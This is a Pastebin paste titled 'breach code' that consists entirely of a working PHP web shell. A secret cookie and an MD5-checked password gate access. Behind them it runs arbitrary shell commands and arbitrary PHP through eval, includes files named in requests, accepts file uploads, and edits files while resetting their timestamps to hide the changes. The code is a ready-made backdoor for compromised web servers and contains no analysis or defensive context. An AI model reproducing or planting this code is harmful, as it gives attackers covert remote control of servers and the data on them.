API tools faq
paste
Advertisement
Guest User

breach code

a guest
Feb 16th, 2012
194
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 6.92 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  if(isset($_COOKIE['G6diSrssm']) || isset($HTTP_COOKIE_VARS['G6diSrssm'])) {
  3.   @set_time_limit(0);
  4.   @error_reporting(2);
  5.   @set_magic_quotes_runtime(0);
  6.   @ini_set('upload_max_filesize',10485760);
  7.   @ini_set('post_max_size',10485760);
  8.   @ini_set('file_uploads', true);
  9.   @ini_set('display_errors',true);
  10.   @ini_set('register_globals',true);
  11.   @ini_set('register_long_arrays',true);
  12.   @ini_set('max_execution_time',false);
  13.   @ini_set('output_buffering',false);
  14.   @ini_set('allow_url_fopen',true);
  15.   $safemode=@ini_get('safe_mode');
  16.  
  17.  
  18.   $magic_quotes=1;
  19.   if (function_exists('get_magic_quotes_gpc')) $magic_quotes=get_magic_quotes_gpc();
  20.  
  21.  
  22.   $phpver = str_replace('.','',phpversion());
  23.   if (strlen($phpver)<3) while (strlen($phpver)<3) $phpver.='0';
  24.   if(intval($phpver) < 410){
  25.     $_POST=&$HTTP_POST_VARS;
  26.     $_GET=&$HTTP_GET_VARS;
  27.     $_SERVER=&$HTTP_SERVER_VARS;
  28.     $_COOKIE=&$HTTP_COOKIE_VARS;
  29.     $_FILES=&$HTTP_POST_FILES;
  30.   }
  31.   @ob_end_clean();
  32.  
  33.  
  34.   $pw_pls="<form method=post><input type=text name=pw></form>";
  35.  
  36.  
  37.   if (empty($_POST['pw'])) exit($pw_pls);
  38.   if (!empty($_POST['pw']) && md5($_POST['pw'])!='79a248de1b0101cbfb4d1a7a60f6d4a5') exit($pw_pls);
  39.  
  40.  
  41.   $pw="<input type=hidden name=pw value='".htmlspecialchars($_POST['pw'])."'>";
  42.  
  43.  
  44.   if (!empty($_POST['usemodule'])) include($_POST['usemodule']);
  45.  
  46.  
  47.   $work_dir = getcwd();
  48.   if (strpos($work_dir,"\\")!==false) $work_dir=str_replace("\\","/",$work_dir);
  49.   if (strpos(substr($work_dir,0,5),":")!==false) $os="win";
  50.   else $os="nix";
  51.   if (!empty($_POST['cd'])) $cd=stripslashes($_POST['cd']);
  52.   else $cd = $work_dir;
  53.  
  54.  
  55.   if (is_dir($cd)) chdir($cd);
  56.  
  57.  
  58.   $run=($magic_quotes)?stripslashes($_POST['run']):$_POST['run'];
  59.   $edit=stripslashes($_POST['edit']);
  60.   if (!@is_file($edit)) $edit=$cd;
  61.  
  62.  
  63.   if (!empty($_POST['eval'])) eval(($magic_quotes)?stripslashes($_POST['eval']):$_POST['eval']);
  64.  
  65.  
  66.   if (!empty($_FILES['userfile']['tmp_name']) && is_uploaded_file($_FILES['userfile']['tmp_name'])) {
  67.     $uploaddir = ereg_replace('/+', '/', $cd."/");
  68.     $uploadfile = $uploaddir.basename($_FILES['userfile']['name']);
  69.     move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile);
  70.   }
  71.  
  72.  
  73.   if (isset($_POST['save'])) {
  74.     if ($magic_quotes) $console = stripslashes($_POST['console']);
  75.     else $console = $_POST['console'];
  76.     $time = filemtime($edit);
  77.     $f=@fopen($edit,"w");
  78.     if ($f) {
  79.       fwrite($f,$console);
  80.       fclose($f);
  81.       touch($edit,$time);
  82.       $edit=$cd;
  83.     }
  84.   }
  85.  
  86.  
  87.   if (!empty($edit) && file_exists($edit) && is_file($edit) && $edit!==$cd) {
  88.     if ($os=='win'?can_write($edit):is_writable($edit)) $need_save_button=true;
  89.     $f=@fopen($edit,"r");
  90.     if ($f) {
  91.       if (filesize($edit)>0) $retval = @fread($f,filesize($edit));
  92.       else $retval = "[empty]";
  93.       fclose($f);
  94.     } else {
  95.       $retval = "Can't open file: $edit\n";
  96.     }
  97.   } elseif (!empty($run)) {
  98.     $cmd = $run;
  99.     $retval = magic_execute($cmd);
  100.   } elseif (file_exists($cd) && @is_dir($cd)) {
  101.  
  102.  
  103.     if (!$safemode)
  104.     {
  105.         if ($os=='win')
  106.         {
  107.  
  108.  
  109.           $cmd = "dir ".str_replace("/","\\",$cd);
  110.           $retval = magic_execute($cmd);
  111.         }
  112.         else
  113.         {
  114.           $cmd = "ls -la \"$cd\"";
  115.           $retval = magic_execute($cmd);
  116.         }
  117.     }
  118.  
  119.  
  120.     if (empty($retval))
  121.     {
  122.         $dir=$cd;
  123.         if($curdir = @opendir($dir)) {
  124.         while($file = readdir($curdir)) {
  125.           if($file != '.' && $file != '..') {
  126.             $srcfile = $dir . '/' . $file;
  127.             if(is_file($srcfile)) {
  128.                 if ($os=='win'?can_write($srcfile):is_writable($srcfile)) $retval .= "++ ".$file."\n";
  129.                 else $retval .= "-- ".$file."\n";
  130.             } elseif(is_dir($srcfile)) {
  131.                 if ($os=='win'?can_write($srcfile):is_writable($srcfile)) $retval .= "d+ ".$file."\n";
  132.                 else $retval .= "d- ".$file."\n";
  133.             }
  134.           }
  135.         }
  136.         closedir($curdir);
  137.         } else $retval = "Cant open directory\n";
  138.     }
  139.  
  140.  
  141.  
  142.   }
  143.  
  144.  
  145.     $id_exec = "cant get uid,gid";
  146.  
  147.  
  148.     if ($tmp = magic_execute("id")) $id_exec = $tmp;
  149.     elseif (function_exists('posix_getgid'))
  150.     {
  151.         $uids  = @posix_getlogin();
  152.         $euids = @posix_getlogin();
  153.         $uid   = @posix_getuid();
  154.         $euid  = @posix_geteuid();
  155.         $gid   = @posix_getgid();
  156.         if (!empty($uid)) $id_exec = "User: uid=$uids($uid) euid=$euid($euid) gid=$gid($gid)";
  157.     }
  158.  
  159.  
  160.   echo '<HTML><BODY onload="document.getElementById(\'cdfocus\').focus();"><HR>';
  161.   echo date("d.m.Y h:i A")." OS:$os $id_exec safe_mode=$safemode";
  162.   echo "<HR>";
  163.   if (isset($need_save_button)) echo "<FORM method=post>";
  164.   echo '<TEXTAREA id="console" name="console" style="width:100%;height:400px;">';
  165.   if (isset($retval)) echo htmlspecialchars($retval);
  166.   echo '</TEXTAREA>';
  167.   if (isset($need_save_button)) echo "$pw<INPUT type='hidden' name='cd' value='".htmlspecialchars($cd)."'><INPUT type='hidden' name='edit' value='".htmlspecialchars($edit)."'><INPUT type=submit name=save value='Save'></FORM>";
  168.   echo "<HR><FORM method=\"POST\">$pw";
  169.   echo "<table><tr><td>dir:</td><td width=\"100%\"><input type=\"text\" style=\"width:100%;\" id=\"cdfocus\" name=\"cd\" value=\"".htmlspecialchars($cd)."\"></td></tr>".
  170.        "<tr><td>run:</td><td><input type=\"text\" style=\"width:100%;\" name=\"run\" value=\"\"></td></tr>".
  171.        "<tr><td>edit:</td><td><input type=\"text\" style=\"width:100%;\" name=\"edit\" value=\"".htmlspecialchars($edit)."\"></td></tr>".
  172.        "</table>".
  173.        "<input type=\"submit\" value=\"OK\"></FORM>";
  174.  
  175.  
  176.   echo "<hr><form enctype=\"multipart/form-data\" method=\"post\">$pw<INPUT type='hidden' name='cd' value='".htmlspecialchars($cd)."'><input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"15000000\" />upload: <input name=\"userfile\" type=\"file\" /><input type=\"submit\" value=\"upload\" /></form><hr>";
  177.   echo "<form method=post>$pw<textarea style=\"width:100%;height:100px;\"  name='eval' id='eval'>phpinfo();</textarea><input type=submit value='EvalPHP'></form><hr>";
  178.   echo "use module: <form method=post>$pw<input type='text' name='usemodule'>&nbsp;<input type=submit value='use'></form><hr>";
  179.   echo "</BODY></HTML>";
  180.  
  181.  
  182.   exit();
  183.  
  184.  
  185.  
  186.   function can_write($file) {if(file_exists($file)){if (is_file($file)) {$f=@fopen($file,"a+");if($f){fclose($f);return true;}}elseif (is_dir($file)) {if ($file[strlen($file)-1]!='/') $file.='/';$tfile = $file."testxxxtest";if (@touch($tfile)){unlink($tfile);return true;}}}return false;}
  187.  
  188.  
  189.     function magic_execute($cmd)
  190.     {
  191.         $res=false;
  192.         if (function_exists('exec'))
  193.         {
  194.             @exec($cmd,$res);
  195.             $res = join("\n",$res);
  196.         }
  197.         else
  198.         if (function_exists('shell_exec'))
  199.             $res = @shell_exec($cmd);
  200.         else
  201.         if (function_exists('system'))
  202.         {
  203.             @ob_start();
  204.             @system($cmd);
  205.             $res = @ob_get_contents();
  206.             @ob_end_clean();
  207.         }
  208.         else
  209.         if(function_exists('passthru'))
  210.         {
  211.             @ob_start();
  212.             @passthru($cmd);
  213.             $res = @ob_get_contents();
  214.             @ob_end_clean();
  215.         }
  216.         else
  217.         if (@is_resource($f = @popen($cmd,"r")))
  218.         {
  219.             $res = "";
  220.             while(!@feof($f)) { $res .= @fread($f,1024); }
  221.             @pclose($f);
  222.         }
  223.         return $res;
  224.     }
  225.  
  226.     exit();
  227. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!